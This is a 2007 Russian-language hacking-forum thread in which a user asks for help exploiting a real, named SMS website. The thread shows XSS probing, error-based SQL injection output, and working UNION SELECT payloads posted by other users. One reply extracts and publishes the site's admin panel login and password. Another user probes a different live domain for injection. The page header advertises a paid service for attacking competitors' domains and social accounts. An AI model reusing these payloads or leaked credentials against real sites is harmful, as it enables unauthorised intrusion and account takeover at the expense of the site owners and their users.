sql inj хелп ми

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
sql inj хелп ми

Опции темы

Поиск в этой теме

Опции просмотра

sql inj хелп ми

30.10.2007, 20:48

Dimi4

Reservists Of Antichat - Level 6

Регистрация: 19.03.2007

Сообщений: 953

С нами: 10077446

Репутация: 3965

sql inj хелп ми

Есть один сайтег.С виду кул, но мною там было обнаружено баги.В том и дело что только обнаружено.

Вот ход моих действий.:
!)Иду по сцылге: http://mysms.ipsys.net/
2)Вижу там "Пошук" и сразу сую джаваскрипт:

PHP код:


		
			
"><script>alert()</script>

Мне выдает:

Цитата:

Warning : preg_match() [function.preg-match]: Unknown modifier 'c' in /home/cmysms/public_html/shr.php on line 89

Понимаю с етим ничево не зделаю....
3) Смотрю дальше..
И вижу строчку:

Цитата:

http://mysms.ipsys.net/index.php?smstype=7

ОоО.Руки тянутся вбить

PHP код:


		
			
/index.php?smstype=phpinj

Как результат -

Цитата:

Помилка запиту: SELECT * FROM `sms` WHERE parentid=СЏ AND dozvil=1
Warning : mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/cmysms/public_html/sms.php on line 95

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/cmysms/public_html/sms.php on line 101

Ничево нешарю в mysqlinj, потомо и незнаю что с етим делать...
4) Покопавшись исчо увидил

Цитата:

/admin/

Сразу вбил

PHP код:


		
			
 ') OR ('1'='1

Ничяво..
Прошу хелпа у знающих...
Пасиб за внимание

𝕏 Twitter Reddit Telegram Копировать ссылку

__________________

BlackHat.

MoDL

Последний раз редактировалось Dimi4; 30.10.2007 в 20:50..

30.10.2007, 20:54

Heavy Metal

Новичок

Регистрация: 16.09.2007

Сообщений: 25

С нами: 9816424

Репутация: 62

http://mysms.ipsys.net/index.php?smstype=0xaaaa+union+select+1,2,version( ),4,5/*

30.10.2007, 20:56

Dimi4

Reservists Of Antichat - Level 6

Регистрация: 19.03.2007

Сообщений: 953

С нами: 10077446

Репутация: 3965

А как бы ето заюзать?

__________________

BlackHat.

MoDL

30.10.2007, 20:58

[53x]Shadow

Leaders of Antichat

Регистрация: 25.01.2007

Сообщений: 341

С нами: 10153766

Репутация: 2565

Код:

http://mysms.ipsys.net/index.php?smstype=-7+union+select+1,concat(login,0x3a,pass)+from+admin+limit+0,1

админка:
http://mysms.ipsys.net/admin/index.php
login:Baltazor
pass:stones

30.10.2007, 23:59

street16

Познающий

Регистрация: 18.09.2006

Сообщений: 43

С нами: 10339129

Репутация: 3

http://www.fuck.ru/products.aspx?id='
Значит ли че нить!!!!Иля я просто напрасно это делаю???
Server Error in '/' Application.
--------------------------------------------------------------------------------

Runtime Error
Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.

Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".



<configuration>
<system.web>
<customErrors mode="Off"/>
</system.web>
</configuration>

Notes: The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's <customErrors> configuration tag to point to a custom error page URL.